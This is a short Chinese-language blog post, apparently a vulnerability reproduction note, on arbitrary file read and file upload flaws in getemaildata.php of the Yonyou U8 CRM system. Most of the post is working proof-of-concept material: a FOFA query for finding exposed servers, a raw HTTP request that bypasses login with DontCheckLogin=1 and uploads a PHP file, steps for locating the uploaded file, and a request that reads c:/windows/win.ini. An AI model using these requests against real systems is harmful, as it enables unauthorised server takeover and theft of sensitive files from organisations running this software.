用友U8 CRM客户关系管理系统 getemaildata.php 任意文件读取漏洞&任意文件上传漏洞

漏洞简介

用友U8 CRM客户关系管理系统 getemaildata.php 存在任意文件读取漏洞,攻击者通过漏洞可以获取到服务器中的敏感文件。
用友 U8 CRM客户关系管理系统 getemaildata.php文件存在任意文件上传漏洞,攻击者通过漏洞可以获取到服务器权限,攻击服务器

漏洞影响

用友 U8 CRM客户关系管理系统

漏洞复现

fofa语法:body="用友U8CRM"
登录页面如下:

文件上传漏洞复现

POC:

POST /ajax/getemaildata.php?DontCheckLogin=1 HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykS5RKgl8t3nwInMQ

------WebKitFormBoundarykS5RKgl8t3nwInMQ
Content-Disposition: form-data; name="file"; filename="test.php "
Content-Type: text/plain

<?php phpinfo();?>

------WebKitFormBoundarykS5RKgl8t3nwInMQ


PS:访问的解析文件格式为upd***.tmp.php,星号部分为返回的文件名的十六进制减去一,例如上图中(不带mht):B565——>42353635(十六进制),42353634(十六进制减一)——>B565


验证url
http://your-ip/tmpfile/upd十六进制减一.tmp.php

文件读取漏洞复现

POC:

/ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/windows/win.ini

posted @ 2023-09-07 16:04  学安全的小白  阅读(850)  评论(0编辑  收藏  举报